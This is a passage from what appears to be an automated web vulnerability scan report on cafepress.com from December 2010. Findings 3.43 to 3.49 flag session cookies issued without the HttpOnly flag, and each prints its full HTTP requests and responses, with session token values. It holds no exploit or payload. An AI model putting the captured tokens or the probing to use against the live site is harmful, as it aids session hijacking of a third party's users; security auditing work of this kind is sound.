GET /1/3/index1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 129977
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:49:04 GMT
Connection: close
Set-Cookie: slx_session=400f6b47f695c657eb3c14bc7e3e4a27523d7ef2; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]...
3.43. http://www.cafepress.com/1/3/indexb1.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /1/3/indexb1.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
slx_session=10526678dae4a1b5ae00b9cc20c52864241e4c1d; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/3/indexb1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 145045
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:49:04 GMT
Connection: close
Set-Cookie: slx_session=10526678dae4a1b5ae00b9cc20c52864241e4c1d; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]...
3.44. http://www.cafepress.com/1/3/indexc1.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /1/3/indexc1.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
slx_session=2f1df64475595c86770a06bc37800f787200ef6f; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/3/indexc1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 134691
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:49:07 GMT
Connection: close
Set-Cookie: slx_session=2f1df64475595c86770a06bc37800f787200ef6f; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]...
3.45. http://www.cafepress.com/TheGamingApe
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /TheGamingApe
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 49058
Date: Sun, 26 Dec 2010 13:48:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]...
3.46. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 301 Moved Permanently
Location: http://www.cafepress.com/
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Content-Length: 0
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cp_ost=; domain=cafepress.com; expires=Sun, 26-Dec-2010 13:45:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
3.47. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/catalogExp/addtocarthelper.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: http://www.cafepress.com/cp/addtocart.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Content-Length: 160
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cafepress.com/cp/addtocart.aspx?">here</a>.</h2> </body></html>
3.48. http://www.cafepress.com/cp/info/about/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 46251
Date: Sun, 26 Dec 2010 13:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 46251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
3.49. http://www.cafepress.com/cp/info/help/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/help/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
